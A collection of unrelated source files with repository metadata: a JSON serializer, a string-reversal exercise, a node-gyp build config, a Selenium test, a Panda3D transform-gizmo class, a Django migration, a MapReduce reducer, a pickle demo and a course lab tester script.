| 2021-07-10T16:19:52
| 2021-07-10T16:19:52
| 384,734,462
| 0
| 0
|
MIT
| 2021-07-10T15:49:31
| 2021-07-10T15:49:30
| null |
UTF-8
|
Python
| false
| false
| 1,529
|
py
|
from dataclasses import dataclass, field
from json import dumps, loads
from typing import Any, Dict
from ..abc import Serializer
from ..marshalling import marshal_object, unmarshal_object
@dataclass
class JSONSerializer(Serializer):
magic_key: str = '_apscheduler_json'
dump_options: Dict[str, Any] = field(default_factory=dict)
load_options: Dict[str, Any] = field(default_factory=dict)
def __post_init__(self):
self.dump_options['default'] = self._default_hook
self.load_options['object_hook'] = self._object_hook
@classmethod
def _default_hook(cls, obj):
if hasattr(obj, '__getstate__'):
cls_ref, state = marshal_object(obj)
return {cls.magic_key: [cls_ref, state]}
raise TypeError(f'Object of type {obj.__class__.__name__!r} is not JSON serializable')
@classmethod
def _object_hook(cls, obj_state: Dict[str, Any]):
if cls.magic_key in obj_state:
ref, *rest = obj_state[cls.magic_key]
return unmarshal_object(ref, *rest)
return obj_state
def serialize(self, obj) -> bytes:
return dumps(obj, ensure_ascii=False, **self.dump_options).encode('utf-8')
def deserialize(self, serialized: bytes):
return loads(serialized, **self.load_options)
def serialize_to_unicode(self, obj) -> str:
return dumps(obj, ensure_ascii=False, **self.dump_options)
def deserialize_from_unicode(self, serialized: str):
return loads(serialized, **self.load_options)
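# Minimal usage sketch (an illustrative addition): plain JSON-compatible
# values round-trip without ever touching the marshalling hooks; objects
# exposing __getstate__/__setstate__ go through marshal/unmarshal_object.
def _example_roundtrip():
    serializer = JSONSerializer()
    payload = serializer.serialize({'id': 1, 'name': 'job'})
    assert serializer.deserialize(payload) == {'id': 1, 'name': 'job'}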
|
[
"alex.gronholm@nextday.fi"
] |
alex.gronholm@nextday.fi
|
967192b03f1c16e356fd0b8218bcfbc2e0b8ef5c
|
aa09302c7186025af42c22664bb291395bee9bae
|
/lecode/Reverse String.py
|
cda659cb35dbde8a177a6e4f7b738f48824bdae1
|
[] |
no_license
|
okliou/_test
|
b7fdf801548d33498d2053ed71436853b8e18003
|
45dbe55a727769ffe10b2e6b92ab5097fbc3d8cc
|
refs/heads/master
| 2020-06-16T23:50:53.180458
| 2019-07-10T11:29:55
| 2019-07-10T11:29:55
| 195,733,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 420
|
py
|
class Solution:
def reverseString(self, s: list) -> None:
"""
Do not return anything, modify s in-place instead.
"""
for i in range(len(s) // 2):
print(s[i], s[- i - 1])
s[i], s[- i - 1] = s[- i - 1], s[i]
print(s[i], s[- i - 1], '-'*20)
        return s  # returned for the demo below; LeetCode expects in-place modification only
if __name__ == '__main__':
print(Solution().reverseString(["H","a","n","n","a","h"]))
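# Expected final line of the demo above (the in-loop prints trace each swap):
#   ['h', 'a', 'n', 'n', 'a', 'H']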
|
[
"okliou@163.com"
] |
okliou@163.com
|
42ff9cc6a926214d8a0a1716f91c5a6cbe4d476f
|
507b25ae0a75752d5cc5d97fd1f1e95ef55bd70e
|
/todo/node_modules/mongoose/node_modules/mongodb/node_modules/mongodb-core/node_modules/kerberos/build/config.gypi
|
0ab330031f1b6e4d0cf85c246d9d0e4e12bb6326
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
Anne0011/ToDo-List
|
86a2dcb60947c68db29b1c43adf7502243d0a201
|
5e2d8d853763577de3329dba17c2384a9b063eb5
|
refs/heads/master
| 2021-01-19T20:27:46.182524
| 2015-04-16T23:23:00
| 2015-04-16T23:23:00
| 33,787,973
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,241
|
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 1,
"host_arch": "x64",
"node_install_npm": "false",
"node_prefix": "/usr/local/Cellar/node/0.10.33_1",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"openssl_no_asm": 0,
"python": "/usr/local/opt/python/bin/python2.7",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"nodedir": "/Users/tammygrose/.node-gyp/0.10.33",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"save_dev": "",
"browser": "",
"viewer": "man",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"shell": "/bin/zsh",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"fetch_retries": "2",
"npat": "",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"spin": "true",
"cache_lock_retries": "10",
"cafile": "",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"json": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/tammygrose/.npm-init.js",
"userconfig": "/Users/tammygrose/.npmrc",
"node_version": "0.10.33",
"user": "",
"editor": "vi",
"save": "",
"tag": "latest",
"global": "",
"optional": "true",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "Infinity",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"strict_ssl": "true",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/Users/tammygrose/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "npm/2.1.12 node/v0.10.33 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"init_version": "1.0.0",
"umask": "18",
"git": "git",
"init_author_name": "",
"scope": "",
"onload_script": "",
"tmp": "/var/folders/4y/xw1pwxgs2w7379s7smy0j4yh0000gn/T",
"unsafe_perm": "true",
"prefix": "/usr/local",
"link": ""
}
}
|
[
"anne.grose68@gmail.com"
] |
anne.grose68@gmail.com
|
101df5215cadd59cef70267543b752ad01970845
|
a682c44945f2c98f7ec6ef846d51753a5b802aca
|
/modules/__init__.py
|
84d71f1f5560207ca8096b3bbfb319bf81a79200
|
[] |
no_license
|
Water-Mngr/CVServer
|
f9d4a2473709787f35142926ba42a2fbd55b2648
|
d48222522c7d3ed251d9c63b4b8d29b01f971b8d
|
refs/heads/main
| 2023-06-03T08:30:56.586145
| 2021-06-20T08:06:16
| 2021-06-20T08:06:16
| 364,805,195
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 221
|
py
|
'''
Copyrights: ©2021 @Laffery
Date: 2021-05-07 17:16:24
LastEditor: Laffery
LastEditTime: 2021-06-18 22:05:04
'''
from .plant_crawler import *
from .plant_id import *
from .plant_cmp import *
from .plant_detect import *
|
[
"2387065420@qq.com"
] |
2387065420@qq.com
|
8ea5c0acb54867b4efc85d696f026abfeabbdb9b
|
b8120566b4ad58944251f5c916f1f57b426b2c58
|
/Test_Cases/test_RecieveSample.py
|
7fb3988e6e735b68059e198fe4cb361d3c7013d4
|
[] |
no_license
|
mrasadali/guruLIS
|
e73fd5191e2063f8c28b70a8ef5c7f2f2e779821
|
3d1dd2250aeb2ddbec31f4cd9eb15ef8219edcb3
|
refs/heads/main
| 2023-06-18T21:39:52.240283
| 2021-07-09T13:17:13
| 2021-07-09T13:17:13
| 354,773,916
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 663
|
py
|
import time
from Page_Object.Recieve_Sample import RecieveSample
from Utilities.BaseClass import BaseClass
class TestCase1(BaseClass):
def test_case3(self):
self.login()
self.driver.get("https://mla-test.azurewebsites.net/Pages/Appointment/CollectedLabSampleReceiving.aspx")
recieve_sample = RecieveSample(self.driver)
# recieve_sample.get_search_specimen()
# # time.sleep(3)
#
# recieve_sample.get_patient_name()
# recieve_sample.get_search_button()
# recieve_sample.get_print_sample()
check = recieve_sample.get_specimen_recieved()
print(check)
time.sleep(5)
|
[
"asadkhaniuk@gmail.com"
] |
asadkhaniuk@gmail.com
|
a91471492905dfdec33fc5bedbecb0181011961d
|
1cd0b84f060c80aba83358d7b5776544d68a08c3
|
/src/core/helpers/trnsf_gizmo/translate.py
|
e773246af9dcc3d437886e5430a355cc70b5809a
|
[] |
no_license
|
leotada/panda3dstudio
|
b480c87f9289fba1ae3a1f7ce7b1efa1d84e879f
|
a5a0890626eb87c1ab8e8ea3442cccbf64c94650
|
refs/heads/master
| 2020-03-20T07:18:24.269859
| 2018-06-13T11:26:15
| 2018-06-13T11:26:15
| 137,277,749
| 0
| 0
| null | 2018-06-13T22:21:15
| 2018-06-13T22:21:15
| null |
UTF-8
|
Python
| false
| false
| 14,687
|
py
|
from .base import *
class TranslationGizmo(TransformationGizmo):
def _create_handles(self):
root = Mgr.get("transf_gizmo_root")
self._origin = root.attach_new_node("translation_gizmo")
self._handle_root = self._origin.attach_new_node("handle_root")
red = VBase4(.7, 0., 0., 1.)
green = VBase4(0., .7, 0., 1.)
blue = VBase4(0., 0., .7, 1.)
grey = VBase4(.5, .5, .5, 1.)
self._axis_colors = {"x": red, "y": green, "z": blue, "screen": grey}
pickable_type_id = PickableTypes.get_id("transf_gizmo")
# Create single-axis handles
for i, axis in enumerate("xyz"):
color_id = self.get_next_picking_color_id()
color_vec = get_color_vec(color_id, pickable_type_id)
self._handle_names[color_id] = axis
pos1 = Point3()
pos1[i] = .04
pos2 = Point3()
pos2[i] = .16
handle = self.__create_axis_handle(self._handle_root, color_vec, pos1, pos2,
"{}_axis_handle".format(axis))
color = self._axis_colors[axis]
handle.set_color(color)
self._handles["axes"][axis] = handle
pos = Point3()
pos[i] = .2
axis_vec = Vec3()
axis_vec[i] = 1.
cone_vec = Vec3()
cone_vec[i] = -.05
cone_vec[(i + 1) % 3] = .01
cone, cap = self.__create_axis_arrow(self._handle_root, color_vec, pos, axis_vec,
cone_vec, 6, "{}_axis_arrow".format(axis))
cone.set_color(color)
cap.set_color(color * .5)
# Create double-axis handles
for plane in ("xy", "xz", "yz"):
color_id = self.get_next_picking_color_id()
color_vec = get_color_vec(color_id, pickable_type_id)
self._handle_names[color_id] = plane
index1 = "xyz".index(plane[0])
index2 = "xyz".index(plane[1])
pos1 = Point3()
pos2 = Point3()
pos3 = Point3()
pos1[index1] = pos2[index1] = pos2[index2] = pos3[index2] = .07
handle, quad = self.__create_plane_handle(self._handle_root, color_vec, pos1, pos2, pos3,
"{}_plane_handle".format(plane))
self._handles["planes"][plane] = handle
self._handles["quads"][plane] = quad
handle[0].set_color(self._axis_colors[plane[0]])
handle[1].set_color(self._axis_colors[plane[1]])
# Create screen handle
color_id = self.get_next_picking_color_id()
color_vec = get_color_vec(color_id, pickable_type_id)
self._handle_names[color_id] = "screen"
handle = self.__create_screen_handle(self._origin, color_vec, .03, "screen_handle")
self._handles["planes"]["screen"] = handle
handle.set_color(grey)
def __create_axis_handle(self, parent, color, pos1, pos2, node_name):
vertex_format = GeomVertexFormat.get_v3cp()
vertex_data = GeomVertexData("axis_line_data", vertex_format, Geom.UH_static)
pos_writer = GeomVertexWriter(vertex_data, "vertex")
pos_writer.add_data3f(pos1)
pos_writer.add_data3f(pos2)
col_writer = GeomVertexWriter(vertex_data, "color")
col_writer.add_data4f(color)
col_writer.add_data4f(color)
lines = GeomLines(Geom.UH_static)
lines.add_vertices(0, 1)
lines_geom = Geom(vertex_data)
lines_geom.add_primitive(lines)
lines_node = GeomNode(node_name)
lines_node.add_geom(lines_geom)
return parent.attach_new_node(lines_node)
def __create_axis_arrow(self, parent, color, pos, axis_vec, cone_vec, segments, node_name):
# Create the arrow cone
vertex_format = GeomVertexFormat.get_v3cp()
vertex_data = GeomVertexData("axis_arrow_data", vertex_format, Geom.UH_static)
pos_writer = GeomVertexWriter(vertex_data, "vertex")
col_writer = GeomVertexWriter(vertex_data, "color")
pos_writer.add_data3f(pos)
col_writer.add_data4f(color)
angle = 360. / segments
quat = Quat()
points = []
for i in xrange(segments):
quat.set_from_axis_angle(angle * i, axis_vec)
points.append(pos + quat.xform(cone_vec))
for point in points:
pos_writer.add_data3f(point)
col_writer.add_data4f(color)
cone = GeomTriangles(Geom.UH_static)
indexes = xrange(1, segments + 1)
for i in indexes:
cone.add_vertices(0, i, indexes[i % segments])
cone_geom = Geom(vertex_data)
cone_geom.add_primitive(cone)
cone_node = GeomNode(node_name)
cone_node.add_geom(cone_geom)
cone_np = parent.attach_new_node(cone_node)
# Create the cap of the arrow cone
vertex_data = GeomVertexData("axis_arrow_data", vertex_format, Geom.UH_static)
pos_writer = GeomVertexWriter(vertex_data, "vertex")
col_writer = GeomVertexWriter(vertex_data, "color")
for point in points:
pos_writer.add_data3f(point)
col_writer.add_data4f(color)
cap = GeomTriangles(Geom.UH_static)
for i in xrange(1, segments - 1):
cap.add_vertices(0, i + 1, i)
cap_geom = Geom(vertex_data)
cap_geom.add_primitive(cap)
cap_node = GeomNode(node_name)
cap_node.add_geom(cap_geom)
cap_np = parent.attach_new_node(cap_node)
return cone_np, cap_np
def __create_plane_handle(self, parent, color, pos1, pos2, pos3, node_name):
vertex_format = GeomVertexFormat.get_v3cp()
def create_line(pos1, pos2):
vertex_data = GeomVertexData("axes_plane_data", vertex_format, Geom.UH_static)
pos_writer = GeomVertexWriter(vertex_data, "vertex")
col_writer = GeomVertexWriter(vertex_data, "color")
pos_writer.add_data3f(pos1)
col_writer.add_data4f(color)
pos_writer.add_data3f(pos2)
col_writer.add_data4f(color)
lines = GeomLines(Geom.UH_static)
lines.add_vertices(0, 1)
lines_geom = Geom(vertex_data)
lines_geom.add_primitive(lines)
lines_node = GeomNode(node_name)
lines_node.add_geom(lines_geom)
return lines_node
line1_np = parent.attach_new_node(create_line(pos1, pos2))
line2_np = parent.attach_new_node(create_line(pos2, pos3))
# Create quad
vertex_data = GeomVertexData("axes_quad_data", vertex_format, Geom.UH_static)
pos_writer = GeomVertexWriter(vertex_data, "vertex")
for pos in (Point3(), pos1, pos2, pos3):
pos_writer.add_data3f(pos)
tris = GeomTriangles(Geom.UH_static)
tris.add_vertices(0, 1, 2)
tris.add_vertices(2, 3, 0)
quad_geom = Geom(vertex_data)
quad_geom.add_primitive(tris)
quad_node = GeomNode("plane_quad")
quad_node.add_geom(quad_geom)
quad_np = parent.attach_new_node(quad_node)
quad_np.set_two_sided(True)
quad_np.set_transparency(TransparencyAttrib.M_alpha)
quad_np.hide(self._picking_mask)
return (line1_np, line2_np), quad_np
def __create_screen_handle(self, parent, color, size, node_name):
vertex_format = GeomVertexFormat.get_v3cp()
vertex_data = GeomVertexData("screen_handle_data", vertex_format, Geom.UH_static)
pos_writer = GeomVertexWriter(vertex_data, "vertex")
col_writer = GeomVertexWriter(vertex_data, "color")
coord = size * .5
for x, z in ((-coord, -coord), (-coord, coord), (coord, coord), (coord, -coord)):
pos = VBase3(x, 0., z)
pos_writer.add_data3f(pos)
col_writer.add_data4f(color)
square = GeomLines(Geom.UH_static)
for i in range(4):
square.add_vertices(i, (i + 1) % 4)
square_geom = Geom(vertex_data)
square_geom.add_primitive(square)
square_node = GeomNode(node_name)
square_node.add_geom(square_geom)
square_np = parent.attach_new_node(square_node)
square_np.set_billboard_point_eye()
square_np.set_bin("fixed", 100)
square_np.set_depth_test(False)
return square_np
def hilite_handle(self, color_id):
if color_id not in self._handle_names:
return
hilited_handles = []
handle_name = self._handle_names[color_id]
if handle_name == "screen":
hilited_handles.append("screen")
else:
for axis in handle_name:
hilited_handles.append(axis)
if handle_name in self._handles["planes"]:
hilited_handles.append(handle_name)
self._handles["quads"][handle_name].show()
if self._hilited_handles != hilited_handles:
self.remove_hilite()
self._hilited_handles = hilited_handles
cyan = VBase4(0., 1., 1., 1.)
cyan_alpha = VBase4(0., 1., 1., .25)
for handle_name in hilited_handles:
if handle_name in self._handles["planes"]:
handle = self._handles["planes"][handle_name]
if handle_name == "screen":
handle.set_color(cyan)
else:
handle[0].set_color(cyan)
handle[1].set_color(cyan)
self._handles["quads"][handle_name].set_color(cyan_alpha)
else:
self._handles["axes"][handle_name].set_color(cyan)
def remove_hilite(self):
if self._hilited_handles:
yellow = VBase4(1., 1., 0., 1.)
yellow_alpha = VBase4(1., 1., 0., .25)
for plane in self._handles["quads"]:
if plane == self._selected_axes:
self._handles["quads"][plane].set_color(yellow_alpha)
self._handles["quads"][plane].show()
else:
self._handles["quads"][plane].hide()
for handle_name in self._hilited_handles:
if handle_name == "screen":
if handle_name == self._selected_axes:
color = yellow
else:
color = self._axis_colors[handle_name]
self._handles["planes"][handle_name].set_color(color)
elif handle_name in self._handles["planes"]:
if handle_name == self._selected_axes:
color1 = color2 = yellow
else:
color1 = self._axis_colors[handle_name[0]]
color2 = self._axis_colors[handle_name[1]]
handle = self._handles["planes"][handle_name]
handle[0].set_color(color1)
handle[1].set_color(color2)
else:
if handle_name in self._selected_axes:
color = yellow
else:
color = self._axis_colors[handle_name]
self._handles["axes"][handle_name].set_color(color)
self._hilited_handles = []
def select_handle(self, color_id):
if color_id not in self._handle_names:
return
axes = self._handle_names[color_id]
Mgr.update_app("axis_constraints", "translate", axes)
def set_active_axes(self, axes):
self._selected_axes = axes
self.remove_hilite()
yellow = VBase4(1., 1., 0., 1.)
yellow_alpha = VBase4(1., 1., 0., .25)
for axis in "xyz":
if axis in axes:
self._handles["axes"][axis].set_color(yellow)
else:
self._handles["axes"][axis].set_color(self._axis_colors[axis])
for plane in self._handles["planes"]:
if plane == "screen":
handle = self._handles["planes"][plane]
handle.set_color(yellow if plane == axes else self._axis_colors[plane])
else:
quad = self._handles["quads"][plane]
quad.set_color(yellow_alpha)
if plane == axes:
handle = self._handles["planes"][plane]
handle[0].set_color(yellow)
handle[1].set_color(yellow)
quad.show()
else:
handle = self._handles["planes"][plane]
handle[0].set_color(self._axis_colors[plane[0]])
handle[1].set_color(self._axis_colors[plane[1]])
quad.hide()
    def get_point_at_screen_pos(self, screen_pos):
        # Build a constraint plane through the gizmo position, then intersect
        # the camera ray through screen_pos with it to obtain the drag point.
        cam = self.cam()
        point1 = Mgr.get("transf_gizmo_world_pos")
        if self._selected_axes == "screen":
normal = self.world.get_relative_vector(cam, Vec3.forward())
plane = Plane(normal, point1)
else:
if len(self._selected_axes) == 2:
axis_vec = Vec3()
axis_vec["xyz".index(self._selected_axes[0])] = 1.
axis_vec = V3D(self.world.get_relative_vector(self._handle_root, axis_vec))
point2 = point1 + axis_vec
axis_vec = Vec3()
axis_vec["xyz".index(self._selected_axes[1])] = 1.
axis_vec = V3D(self.world.get_relative_vector(self._handle_root, axis_vec))
point3 = point1 + axis_vec
            else:
                # Single axis: use a plane that contains the axis and faces
                # the camera as much as possible (via axis x view direction).
                axis_vec = Vec3()
axis_vec["xyz".index(self._selected_axes)] = 1.
axis_vec = V3D(self.world.get_relative_vector(self._handle_root, axis_vec))
cam_vec = V3D(self.world.get_relative_vector(cam, Vec3.forward()))
cross_vec = axis_vec ** cam_vec
if not cross_vec.normalize():
return point1
point2 = point1 + axis_vec
point3 = point1 + cross_vec
plane = Plane(point1, point2, point3)
near_point = Point3()
far_point = Point3()
self.cam.lens.extrude(screen_pos, near_point, far_point)
rel_pt = lambda point: self.world.get_relative_point(cam, point)
intersection_point = Point3()
if not plane.intersects_line(intersection_point, rel_pt(near_point), rel_pt(far_point)):
return
return intersection_point
|
[
"Epihaius@users.noreply.github.com"
] |
Epihaius@users.noreply.github.com
|
ce49c0b233425ec0f195e7edd7871fec58b159d6
|
808905832b0eedfd14ac719fd59b911636c94eb9
|
/app/migrations/0001_initial.py
|
8d24ab1292ccf833ace414f2698c8ae4219cf3ed
|
[] |
no_license
|
hikaru4215/cosme-portfolio
|
27aef4fcdc410d0df5de22fe96729d810672233c
|
d4f5927631aa44df4dca74a2d73ff293025871d9
|
refs/heads/main
| 2023-03-24T23:34:58.334680
| 2021-03-21T13:44:14
| 2021-03-21T13:44:14
| 349,323,618
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,139
|
py
|
# Generated by Django 2.2.19 on 2021-03-19 08:20
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, verbose_name='カテゴリ')),
],
),
migrations.CreateModel(
name='Price',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('price', models.CharField(max_length=50, verbose_name='プライス')),
],
),
migrations.CreateModel(
name='Score',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('scores', models.CharField(max_length=50, verbose_name='おすすめ度')),
],
),
]
|
[
"hikaru4215hkr2178ay@yahoo.co.jp"
] |
hikaru4215hkr2178ay@yahoo.co.jp
|
6d8380f28efb8e4e51f189e61b0814a61df18843
|
aad8db2013579bac732a3c650c7a0f7df15e4c21
|
/Week14/Karl_Roth_reducer.py
|
92ff1b3716c7c552fe03b17455d2c707c3ef9e9a
|
[] |
no_license
|
nrothchicago/DataScience
|
1c8756d38c6fdf001f7c0692d11915465c9675d8
|
174fc78b10ea1751f5f86da5b0885875d33d29f2
|
refs/heads/master
| 2021-06-21T04:30:52.053432
| 2017-07-17T15:02:28
| 2017-07-17T15:02:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 921
|
py
|
#!/usr/bin/env python3
import sys
# We explicitly define the city/count separator token.
sep = '\t'
# We open STDIN and STDOUT
with sys.stdin as fin:
with sys.stdout as fout:
# Keep track of current city and count
ccity = None
ccount = 0
city = None
# For every line in STDIN
for line in fin:
            # Split the line into city and count, using the
            # predefined separator token.
            city, scount = line.split(sep, 1)
# Assume count is always an integer
count = int(scount)
# city is either repeated or new
if ccity == city:
ccount += count
else:
# We have to handle the first city explicitly
                if ccity is not None:
fout.write("{0:s}{1:s}{2:d}\n".format(ccity, sep, ccount))
# New city, so reset variables
ccity = city
ccount = count
        else:
            # Output the count for the final city (this for-else clause runs
            # once the loop over stdin is exhausted)
            if ccity == city:
                fout.write("{0:s}{1:s}{2:d}\n".format(city, sep, ccount))
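# Illustrative run (hypothetical, tab-separated, pre-sorted mapper output):
#
#   stdin:           stdout:
#   Boston  1        Boston  2
#   Boston  1        Chicago 1
#   Chicago 1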
|
[
"karoth14@gmail.com"
] |
karoth14@gmail.com
|
9824cb548ab42610e212efea7d1ab5ed82095248
|
01ff60b36061d6905951f815502945c4373715b7
|
/serializar_objetos.py
|
66275cdfe9b06a2f8a7649a7f152f7cd533a048d
|
[] |
no_license
|
solcra/pythonEstudio
|
84b6d15f395b71ec5ae5ca5398f1638fb29f656f
|
34408722377c35012dd937ea17a197f5ce622b3c
|
refs/heads/main
| 2022-12-29T11:57:45.449151
| 2020-10-11T01:57:32
| 2020-10-11T01:57:32
| 302,904,463
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 863
|
py
|
import pickle
class Vehiculos():
def __init__(self, marca, modelo):
self.marca=marca
self.modelo=modelo
self.enmarcha=False
self.acelera=False
self.frena=False
def arrancar(self):
self.enmarcha=True
def acelerar(self):
self.acelera=True
def frenar(self):
self.frena=True
def estado(self):
print("Marca: ",self.marca, "\nModelo: ", self.modelo, "\nEn marcha: ",self.enmarcha, "\nAcelera: ", self.acelera, "\nFrenado: ", self.frena)
coche1 =Vehiculos("Mazda", "MX5")
coche2 =Vehiculos("Seat", "Leon")
coche3 =Vehiculos("Renault", "Megane")
coches=[coche1, coche2, coche3]
fichero=open("losCoches","wb")
pickle.dump(coches, fichero)
fichero.close()
del fichero
ficheroApertura = open("losCoches","rb")
misCoches=pickle.load(ficheroApertura)
ficheroApertura.close()
for c in misCoches:
c.estado()
|
[
"carlosgranadacra@gmai.com"
] |
carlosgranadacra@gmai.com
|
dfe5424bd34a26902cf8464f56f024f2e864b554
|
e763c08677250bfbeaa444910d052560a0c6835f
|
/lab0/tester.py
|
7d791f5f1a04d70b19056ff399207cf056a04236
|
[] |
no_license
|
Lenaxiao/MIT-6.034-lab-works
|
bd72bfd069413e7eb7aa9baf8c41077b4f9bbaf5
|
363cebf9cd9b8b2ef3d29863875fdf626929a803
|
refs/heads/master
| 2022-11-06T18:39:21.173564
| 2020-06-17T20:01:21
| 2020-06-17T20:01:21
| 273,063,358
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,218
|
py
|
import xmlrpc.client as xmlrpclib  # Python 3 module name; alias keeps the references below working
import traceback
import sys
import os
import tarfile
from io import BytesIO  # tarfile needs a binary buffer under Python 3
# This is a skeleton for what the tester should do. Ideally, this module
# would be imported in the pset and run as its main function.
# We need the following rpc functions. (They generally take username and
# password, but you could adjust this for whatever security system.)
#
# tester.submit_code(username, password, pset, studentcode)
# 'pset' is a string such as 'ps0'. studentcode is a string containing
# the contents of the corresponding file, ps0.py. This stores the code on
# the server so we can check it later for cheating, and is a prerequisite
# to the tester returning a grade.
#
# tester.get_tests(pset)
# returns a list of tuples of the form (INDEX, TYPE, NAME, ARGS):
# INDEX is a unique integer that identifies the test.
# TYPE should be one of either 'VALUE' or 'FUNCTION'.
# If TYPE is 'VALUE', ARGS is ignored, and NAME is the name of a
# variable to return for this test. The variable must be an attribute
# of the lab module.
# If TYPE is 'FUNCTION', NAME is the name of a function in the lab module
# whose return value should be the answer to this test, and ARGS is a
# tuple containing arguments for the function.
#
# tester.send_answer(username, password, pset, index, answer)
# Sends <answer> as the answer to test case <index> (0-numbered) in the pset
# named <pset>. Returns whether the answer was correct, and an expected
# value.
#
# tester.status(username, password, pset)
# A string that includes the official score for this user on this pset.
# If a part is missing (like the code), it should say so.
# Because I haven't written anything on the server side, test_online has never
# been tested.
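# Illustrative round-trip against the interface sketched above (hypothetical
# values; the real calls are made in test_online() below):
#   server = xmlrpclib.Server(server_url)
#   for index, type, name, args in server.get_tests(username, password, 'ps0'):
#       ...compute the answer locally...
#       correct, expected = server.send_answer(username, password, 'ps0', index, answer)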
def test_summary(dispindex, ntests):
return "Test %d/%d" % (dispindex, ntests)
def show_result(testsummary, testcode, correct, got, expected, verbosity):
if correct:
if verbosity > 0:
print("%s: Correct." % testsummary)
if verbosity > 1:
print('\t', testcode)
print()
else:
print("%s: Incorrect." % testsummary)
print('\t', testcode)
print("Got: ", got)
print("Expected:", expected)
def show_exception(testsummary, testcode):
    print("%s: Error." % testsummary)
    print("While running the following test case:")
    print('\t', testcode)
    print("Your code encountered the following error:")
    traceback.print_exc()
    print()
def get_lab_module():
lab = None
# Try the easy way first
try:
from tests import lab_number
lab = __import__('lab%s' % lab_number)
except ImportError:
pass
    for labnum in range(6):
        try:
            lab = __import__('lab%s' % labnum)
            break  # stop at the first lab module that imports successfully
        except ImportError:
            pass
    if lab is None:
raise ImportError(
"Cannot find your lab; or, error importing it. Try loading it by running 'python labN.py' (for the appropriate value of 'N').")
if not hasattr(lab, "LAB_NUMBER"):
lab.LAB_NUMBER = labnum
return lab
def run_test(test, lab):
id, type, attr_name, args = test
attr = getattr(lab, attr_name)
if type == 'VALUE':
return attr
elif type == 'FUNCTION':
        return attr(*args)  # apply() was removed in Python 3
else:
        raise Exception(
            "Test Error: Unknown TYPE '%s'. Please make sure you have downloaded the latest version of the tester script. If you continue to see this error, contact a TA." % type)
def test_offline(verbosity=1):
import tests as tests_module
test_names = list(tests_module.__dict__.keys())
test_names.sort()
tests = [(x[:-8],
getattr(tests_module, x),
getattr(tests_module, "%s_testanswer" % x[:-8]),
getattr(tests_module, "%s_expected" % x[:-8]),
"_".join(x[:-8].split('_')[:-1]))
for x in test_names if x[-8:] == "_getargs"]
ntests = len(tests)
ncorrect = 0
for index, (testname, getargs, testanswer, expected, fn_name) in enumerate(tests):
dispindex = index+1
summary = test_summary(dispindex, ntests)
if getargs == 'VALUE':
type = 'VALUE'
def getargs(): return getattr(get_lab_module(), testname)
fn_name = testname
else:
type = 'FUNCTION'
try:
answer = run_test((0, type, fn_name, getargs()), get_lab_module())
correct = testanswer(answer)
except Exception:
show_exception(summary, testname)
continue
show_result(summary, testname, correct, answer, expected, verbosity)
if correct:
ncorrect += 1
print("Passed %d of %d tests." % (ncorrect, ntests))
return ncorrect == ntests
def get_target_upload_filedir():
# Get current directory. Play nice with Unicode pathnames, just in case.
cwd = os.getcwd()
print("Please specify the directory containing your lab.")
print("Note that all files from this directory will be uploaded!")
print("Labs should not contain large amounts of data; very-large")
print("files will fail to upload.")
print()
print("The default path is '%s'" % cwd)
    target_dir = input("[%s] >>> " % cwd)
target_dir = target_dir.strip()
if target_dir == '':
target_dir = cwd
print("Ok, using '%s'." % target_dir)
return target_dir
def get_tarball_data(target_dir, filename):
    data = BytesIO()
file = tarfile.open(filename, "w|bz2", data)
print("Preparing the lab directory for transmission...")
file.add(target_dir)
print("Done.")
print()
print("The following files have been added:")
for f in file.getmembers():
print(f.name)
file.close()
return data.getvalue()
def test_online(verbosity=1):
lab = get_lab_module()
try:
server = xmlrpclib.Server(server_url, allow_none=True)
tests = server.get_tests(username, password, lab.__name__)
except NotImplementedError:
print("Your version of Python doesn't seem to support HTTPS, for")
print("secure test submission. Would you like to downgrade to HTTP?")
